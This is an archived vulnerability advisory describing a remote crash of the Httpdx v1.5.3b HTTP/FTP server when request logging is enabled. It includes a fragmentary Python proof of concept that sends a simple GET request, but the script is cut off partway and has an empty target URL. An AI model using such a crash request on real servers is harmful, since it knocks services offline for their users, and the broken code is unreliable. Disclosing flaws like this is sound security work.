AOH :: HP Unsorted V :: BU-2048.HTM

Httpdx v1.5.3b vulnerability
Vulnerability Httpdx v1.5.3b
Vulnerability Httpdx v1.5.3b

Program          : Httpdx v1.5.3b
PoC              : Remote Crash Service (if http.log=1)
Homepage : 
Found by         : Jonathan Salwan
This Advisory    : Jonathan Salwan
Contact : 

//----- Application description
Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs with only few threads. Includes directory listing,
virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc.
All settings in one config/script file. 
//----- Description of vulnerability
The vulnerability is caused due to set http.log=1 in httpdx.conf - Error
Writting log
This can be exploited to crash all services http & ftp.
Use simple GET request for crash service.

//----- Credits§ion_id=78 

import urllib
import urllib2

url = '' 

req = urllib2.Request(url)
answer = urllib2.urlopen(req)
page =

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to